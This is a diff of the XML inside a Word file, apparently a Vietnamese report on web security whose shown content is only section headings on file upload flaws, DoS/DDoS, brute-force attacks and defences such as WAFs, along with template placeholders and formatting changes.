+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="21" w:name="_Toc208343454"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Cơ chế hoạt động</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> và phân loại</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="21"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="22" w:name="_Toc208343455"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Hậu quả</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="22"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="23" w:name="_Toc208343456"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Lỗ hổng tải lên tệp (File Upload Vulnerability)</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="23"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="24" w:name="_Toc208343457"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Nguyên nhân và cách thức khai thác</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="24"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="25" w:name="_Toc208343458"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Hậu quả</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="25"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="26" w:name="_Toc208343459"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Tấn công từ chối dịch vụ (DoS/DDoS)</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="26"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="27" w:name="_Toc208343460"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Phân biệt DoS và DDoS</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="27"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="28" w:name="_Toc208343461"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Các dạng tấn công theo lớp</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="28"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="29" w:name="_Toc208343462"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Hậu quả</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> và các case study nổi tiếng</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="29"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="30" w:name="_Toc208343463"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Tấn công dò mật khẩu (Brute-Force Attack)</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="30"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="31" w:name="_Toc208343464"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Cơ chế hoạt động và các biến thể</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="31"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="32" w:name="_Toc208343465"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Hậu quả và các công cụ tấn công</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="32"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="33" w:name="_Toc208343466"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>BIỆN PHÁP PHÒNG CHỐNG VÀ BẢO VỆ</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="33"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="34" w:name="_Toc208343467"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Phòng </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>chống ở cấp độ Ứng dụng</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="34"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:ind w:left="792"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Nội dung của tiểu mục cấp 2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="35" w:name="_Toc208343468"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Tiểu mục cấp 3</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="35"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:ind w:left="1224"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
         </w:rPr>
         <w:t>Nội dung của tiểu mục cấp 3</w:t>
       </w:r>
@@ -4309,10 +8385,9 @@
           <w:iCs/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc207351928"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="36" w:name="_Toc208343469"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4320,11 +8395,10 @@
           <w:iCs/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
-          <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>Tiểu mục cấp 4</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="3"/>
+      <w:bookmarkEnd w:id="36"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4344,17 +8418,8 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
-          <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>Nội dung của tiểu mục cấp 4</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>(để copy)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4386,16 +8451,28 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Tấn công Cross-Site Scripting (XSS) </w:t>
-      </w:r>
+      <w:bookmarkStart w:id="37" w:name="_Toc208343470"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Phòng </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>chống ở cấp độ Hạ tầng</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="37"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4412,21 +8489,24 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Cơ chế hoạt động</w:t>
-      </w:r>
+          <w:i/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="38" w:name="_Toc208343471"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Tường lửa Ứng dụng Web (WAF)</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="38"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4444,22 +8524,197 @@
           <w:b/>
           <w:bCs/>
           <w:i/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="39" w:name="_Toc208343472"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:i/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Các dạng tấn công và dặc điểm </w:t>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Các giải pháp chống DDoS</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="39"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="40" w:name="_Toc208343473"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Các biện pháp an</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> toàn cho Tài khoản và Quản trị</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="40"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:ind w:left="1224"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
